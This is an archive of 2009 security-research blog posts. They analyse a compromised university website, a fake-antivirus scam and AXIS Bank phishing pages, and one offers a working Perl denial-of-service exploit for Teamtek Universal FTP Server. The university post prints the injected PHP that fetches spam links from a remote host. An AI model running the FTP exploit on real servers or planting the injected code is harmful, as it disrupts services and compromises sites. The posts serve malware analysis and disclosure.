Friday, October 9, 2009

Premier University of Andhra Pradesh Serving Malware.

Couple of days back I reported the infection to few Security Researchers through OWASP. Now Firefox and Google says the same!! If we visit http://www.nagarjunauniversity.ac.in/, Firefox browser alarms you with the following warning

Other way round to make sure whether it is service malicious pages or malware is: type "nagarjunauniversity" in google window and open the first link

Google description about the pages hosted by www.nagarjunauniversity.ac.in is

Real time view of malicious pages and Analysis
Visiting the site welcomes you with script execution, see diagram below
Viewing the source of this page will make you think for a while. Why Chinese and Russian links are present in the page?? Have a glimpse of the code.


Whe I reported the incident on OWASP, base64 encoded code was present on this page. Don't worry? The code is still present but on other pages. When I am writin this blog base64 encoded content was present at the following pages and many more
http://www.nagarjunauniversity.ac.in/administration.asp
http://www.nagarjunauniversity.ac.in/downloads.asp
Source code of either of the pages looks like
If you observe carefully we can see a site which is partially encoded (percentage encoding)
http%3A%2F%2Fbale.ws%2Fshow.php
Google's description had a mention about bale.ws domain.
When we open above site it gets redirected to
http://superpupermegacasino.com/which hosts *SmartDownload.exe*

Details of the EXE at Virustotal is shown as *Win32/CasOnline!Adware*. Further details about the binary can be found at
http://www.virustotal.com/analisis/9709a6f32be02642671f96ee264bae85fc924072ceb1a6f07c94ab94ae77943d-1254763534

Well, decoding the base64 content with base64_decode() method present within the malicious page gives the below script which is passed as an argument to eval(). eval executes the script

error_reporting(0);

$links = new GetLinks();

echo $links->Links;
class GetLinks
{
var $host = "esli.tw";
var $path = "/link.php?site=";
var $site = "";
var $user_agent = "";

var $Links = "";


var $_socket_timeout = 12;
var $_cashe_life_time = 3600;
var $_cashe_file = "cashe.txt";

function GetLinks()
{
if (!is_file($this->_cashe_file) || (filemtime($this->_cashe_file) < (time()-$this->_cashe_life_time)) || filesize($this->_cashe_file) == 0) {

$this->site = isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : $HTTP_SERVER_VARS['HTTP_HOST'];
$this->user_agent = $_SERVER['HTTP_USER_AGENT'];

$this->Links = $this->fetch_remote_file();
if ($handle = fopen($this->_cashe_file, 'w')) {
fwrite($handle, $this->Links);
}

fclose($handle);
}
else {
$this->Links = file_get_contents($this->_cashe_file);
}
}

function fetch_remote_file()
{
$buff = '';
$fp = fsockopen($this->host, 80, $errno, $errstr, $this->_socket_timeout);
if (!$fp) {

} else {
$out = "GET {$this->path}{$this->site} HTTP/1.1\r\n";
$out .= "Host: {$this->host}\r\n";
$out .= "Connection: Close\r\n\r\n";

fwrite($fp, $out);
while (!feof($fp)) {
$buff .= fgets($fp, 128);
}
fclose($fp);
$page = explode("\r\n\r\n", $buff);
return $page[1];
}
}
}
I am not sure what cashe.txt does and what are its contents!
The HTML Tag which is responsible for execution of scripts, malware etc is IFRAME.
Next blog will be most probably SmartDownload.exe binary analysis. Safe Surfing!!!

Friday, September 4, 2009

Personal Antivirus: antimalwarescanner8.com/ best-antivirus8.com/ hqvirusscanner.com/ advancedpcscanner3.com

I typed my search keywords into Google and clicked on few links on the first page of results. One site interested me because it was redirecting me to some other site, the malicious web page whic is redirecting to new page was embedded with unnoticeable flash file named intro.swf. The web page on the redirected site welcomes us with a pop-up window saying "Warning!!!Your system.......". The pop-up warning window is similar across all malicious domains.
If we click OK or Cross(X)/Close button it will take us to fake scanning page depicting real Anti -virus scanning of the PC.
After the scanning it gives the scan results as shown in figure below depicting a real Anti-Virus scan stating various directories on the PC are infected with trojans.
Asks the users to download "Personal Antivirus" to protect their PC.
Clicking anywhere on this page will give a pop-up window to download Anti-virus binary.
If we click on the page for multiple times it will pop-up multiple windows for downloading
Antivirus-[a-f0-9]{3,7}_2031.exe file.If we do "View Source" on above page it will show few interesting javascript files.
Contents of listfile.js were interesting because it had an array of various file names with EXE, HLP, DLL etc extensions.
I downloaded different binary files samples but all the files had same MD5 value. Surprising !!!
Tried to execute the sample on VMware with MS Windows XP SP2 installed. It gives the following memory access error on VM. Is it detecting VM environment?!!
I executed the same sample on MS Windows Server 2003 Standard Edition with SP2 but not able to run the sample successfully.
Don't try to access domains with URI
http://maliciousdomain.com/1/?sess=p2T4yjjxMi01JmlwPTY3Ljk3LjgwLjUmdGltZT0xMjU1MUAMPQZM

sess parameter is changing with every malicious domain. I was littile suspicious with the sess parameters value for base64 encoding, decoding it to ASCII gives
§døÊ8ñ2-5&ip=67.97.80.5&time=12551@ = L
Wow!! It contains an IP Address.

Malicious Domains:
hqvirusscanner.com
antimalwarescanner8.com
advancedpcscanner3.com
best-antivirus8.com
antivirus-fast-scan04.com
(new domains might come up soon)
File Name: Antivirus_[a-z0-9]{3,7}.exe
Antivirus-[a-f0-9]{3,7}_2031.exe
File Size: 163840 bytes
MD5: 22fb04afad00ccaeda1f5e5892493d77
Malware Type: Browser Hijackers
Threat Level: High

  • File is Packed with unknown packer.
  • PEiD doesn't give any packer name.
  • OllyDBG throws exception while loading the file.
  • Imports few APIs from KERNEL32.DLL
Virustotal results can be found at
http://www.virustotal.com/analisis/6a761c86645ca3b8b808a80f330ffb315dc5c175089abf7f8ff9ea2ddbbc57b2-1252076765

If I successfully run the malicious file then I will post a new blog. Be cautious while surfing the net and when you come across pop-ups!!

Sunday, August 9, 2009

Hello MicroSoft...Is SCRIPT Execution Really Safe?!!

I was editing browser settings on IE7 to allow script/applet execution. After saving the configuration I accessed a site which has an applet. As expected browser gave an error message saying " Your security settings do not allow websites to use ActiveX controls installed on your computer. This page may not display correctly. Click here for options..."


But......observe pop-up window ............!!
Scripts are usually safe.......Micro$$$$oft feels that SCRIPT execution is safe!!!


Version details of my browser, IE7, are
Version: 7.0.5730.13
Product ID: 92319-600-1753032-45410
Update Versions: 0

For "Happy Browsing" use Firefox.

Tuesday, April 7, 2009

Shortcut "Open Command Prompt" here

Very Useful Shortcut "Open Command Prompt here"

1. Open any Folder/directory (already existing on the machine) by couble clicking or press "Windows+E" keys simultaneously.
2. Go to Tools->Folder Options. When you click Folder Options, new window will pop-up.
3. Select File Types.
4. Go to (NONE) Folder found under"Registered file types:".
5. Select "(NONE) Folder"
6. Now press "Advanced" tab.
6. Press New tab.
Action:
Open Command Prompt here

Application used to perform action:
path_to_cmd.exe (e.g. C:\WINDOWS\system32\cmd.exe)

7. Press OK->OK->Close tabs.
After the completion of seven steps above if you click any directory you can see "Open Command Prompt" in the menu which is marked with Red rectangla in the diagram.


Now you can right click on any Folder/Directory on any Windows OS (I tested on Windows Server 2003 with SP2 and Windows XP with SP2) and open Command Prompt from that Directory path.

Saturday, March 28, 2009

ZEBRA Protocol and BitTorrent !

I was just checking my mails. Got bored, started Wireshark!!!

To my surprise I saw packets with Zebra Protocol over TCP port 27756.


I didn't understand which application is using this protocol. I googled for the same which said that Zebra is a routing protocol, I was not convinced with the result.

I further analyzed the Packet Capture and used netstat, Task Manager etc. from which I came to know that BitTorrent is using Zebra Protocol. One more thing to add, BitTorrent also uses "BitTorrent" Protocol for communication over TCP.


Further analysis of the PCAP and googling gave information like Zebra is a streaming protocol for P2P communication.

To know about Google Talk Jabber protocol communication with wireshark captures follow below link
http://darshanams.blogspot.in/2008/11/deciphering-google-talk-jabber.html

For Bittorrent detection signatures
http://darshanams.blogspot.in/2012/07/bittorrent-useragents-and-detection.html

Wednesday, February 11, 2009

AXIS Bank Phishing2...Be Careful !

Don't be surprised if you get a mail from AXIS bank (infact not from AXIS bank but from malicious user) saying "MPORTANT NOTICE: Update Your Axis Bank Ltd® Net Banking Details" (this is the subject). Notice the missing "I" for word IMPORTANT in the subject. Most people might end up reading reading "MPORTANT" as "IMPORTANT".
The mail looks like
Clicking "Update Your NetBanking Account" will redirect us to
http://axisaccountsummary.t35.com/axisbank.co.in/RetailSignOn.htm
which looks like

Write anything in "Login ID" and "Password" text boxes and Click "Submit" tab without selecting the radio buttons, this will redirect us to
http://axisaccountsummary.t35.com/axisbank.co.in/authenticate.php
The authenticate.php page looks like

On this page we find "Download","Click Here" hyperlinks, on clicking them will redirect to
https://www.axisbank.co.in/BankAway/(b5zbwu55bnaszw55d2iyuz55)/web/L001/retail/jsp/user/%5Cdownload%5Ciconnectform.pdf
https://www.axisbank.co.in/BankAway/(b5zbwu55bnaszw55d2iyuz55)/web/L001/retail/jsp/user/%5Cdownload%5Cicoftfform.pdf
respectively. Above URL's which point to the real website are using HTTPS request to get the resource and we can see the Phishing filter(Lock symbol) on down left but we get "The page cannot be found" error while downloading the PDF's.
Enter any arbitrary data into "ATM Card No.", "ATM Pin No.","Transaction Password" and click "Continue" tab which will redirect to
http://christkingdomorphanage.org/idbi2/accountsummary.php

I browsed to the Contact Us page (http://www.christkingdomorphanage.org/contactus.php) where the address is mentioned as
CHRIST KINGDOM ORPHANAGE HOME
UMUEZEALAKPA ALAENYI
OGWA, MBAITOLI LGA,
IMO STATE, NIGERIA
p: (+234) 8033738658
e: http://www.christkingdomorphanage.org/info@christkingdomorphanage.org
w: http://www.christkingdomorphanage.org/

Well, this might be the phishing mail originating from Nigeria, most probably.

Safe Surfing...Enjoy!!!

Tuesday, February 3, 2009

Teamtek Universal FTP Server 1.0.50 DoS (daemon crash/ hang)

This is a working exploit for an old Vulnerability which was updated recently.
############################################################
#
# Teamtek Universal FTP Server 1.0.50 allows remote attackers to cause a denial of service (daemon crash or hang) via (1)
# multiple STOR (aka PUT) commands, or an MKD command followed by (2) a '*' argument, (3) a '|' argument,
# (4) spaces, or (5) a long string. NOTE: the provenance of this information is unknown; the details are obtained solely
# from third party information.
#
# References:
# http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-7235
# http://www.securityfocus.com/bid/21085
#
# Tested on Windows XP SP1 with
# Universal FTP Server 1.0.44
# Banner: UNIVERSAL FTP SERVER - by Daniele Pratelli - www.teamtek.net - www.5e5.net
# With "mkdir |" command application crashes with "Run-time error '52:' Bad file name or number"
# With "mkdir *" command application crashes with "Run-time error '76:' Path not found"
#
# To run this exploit on MS Windows replace "#!usr/bin/perl -w" with "#!Installation_path_for_perl -w"
# (say #!C:/Perl/bin/perl -w)
# This was strictly written for educational purpose. Use it at your own risk.
# Author will not bare any responsibility for any damages watsoever.
# Author: Praveen Darhanam
# Email: praveen[underscore]recker[at]sify.com
# Date: 20th December, 2008
##########################################################
use Net::FTP;
$ftp_dos_mkd=Net::FTP->new("$ARGV[0]",Debug=>0) || die "Cannot connect to Host $ARGV[0]\n Usage: ]#perl script_name
vuln_target_ip r Host\n";
$ftp_dos_mkd -> login("anonymous","anonymous") || die "Could not Login...Retry";
print "Enter 1 to launch FTP DoS using using multiple STOR/PUT commands\n";
print "Enter 2 to launch FTP DoS using directory name as * with MKD command\n";
print "Enter 3 to launch FTP DoS using directory name as | with MKD command\n";
print "Enter 4 to launch FTP DoS using MKD command followed by spaces\n";
print "Enter 5 to launch FTP DoS using MKD command followed by long string\n";

$special_char=;
chomp($special_char);
if($special_char==1)
{
while(1)
{
$ftp_dos_mkd -> stor("abc.txt");
}
}
elsif($special_char==2)
{
$ftp_dos_mkd -> mkdir("*");
}
elsif($special_char==3)
{
$ftp_dos_mkd -> mkdir("|");
}
elsif($special_char==4)
{
my $buf1 = "\x20" x 100000;
$ftp_dos_mkd -> mkdir("$buf1");
}
elsif($special_char==5)
{
my $buf2 = "D" x 100000;
$ftp_dos_mkd -> mkdir("$buf2");
}
else
{
printf "Please enter correct number to launch exploit !!";
}

$ftp_dos_mkd->quit;

Thursday, January 22, 2009

AXIS Bank Phishing1...Be Careful !

I has been seeing these mails from long time. I never used to open such mails, instead delete the mails. This time thought of writing about the issue. Got a mail from "AXIS Bank" (fake) with Subject "AXIS Bank Security Service Notification (IMPORTANT)". When opened, the mail looks like

We can find the following URL in the mail
When we hover mouse over the URL we can see http://eyering.com/interaction/cache/update/axis.php
link below the page.
The page below is original AXIS BANK's login page
When we click the link in the mail it will redirect us to the URL http://iamthecompetition.com/subscription/axisbank.co.in/RetailSignOn.htm
and the page looks like
This is the phishing page used by attackers to collect user names and passwords.
If you click "Submit" tab below radio button's it'll reidrect to other page which asks for ATM Pin !!
Safe Surfing...Enjoy!!!